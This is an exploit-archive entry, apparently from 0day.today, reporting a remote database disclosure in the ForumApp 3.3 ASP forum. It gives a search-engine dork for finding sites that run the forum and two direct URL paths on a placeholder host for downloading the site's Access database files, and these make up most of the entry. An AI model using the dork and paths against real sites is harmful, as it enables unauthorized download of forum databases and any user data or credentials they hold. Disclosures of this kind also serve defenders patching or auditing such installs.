id: 4554
date: 12/28/2008
title: ForumApp 3.3 Remote Database Disclosure Vulnerability
author: Cyber.Zer0
cves: 

=====================================================
ForumApp 3.3 Remote Database Disclosure Vulnerability
=====================================================


###########################################################

#Title:       ForumApp V3.3 Remote Database Disclosure Vulnerability

#Credit:             Cyber.Zer0                                                                                                    

#Download:    http://www.aspapp.com/free-asp-forum~

#HomePage:  http://www.aspapp.com/

#Remote:      Yes   

#Dork:            "Powered by ForumApp"                                                                                  

############################################

--=[Database Disclosure]=--

http://target.com/data/8690.mdb
http://target.com/data/8690BAK.mdb

####################################



#  0day.today [2023-03-22]  #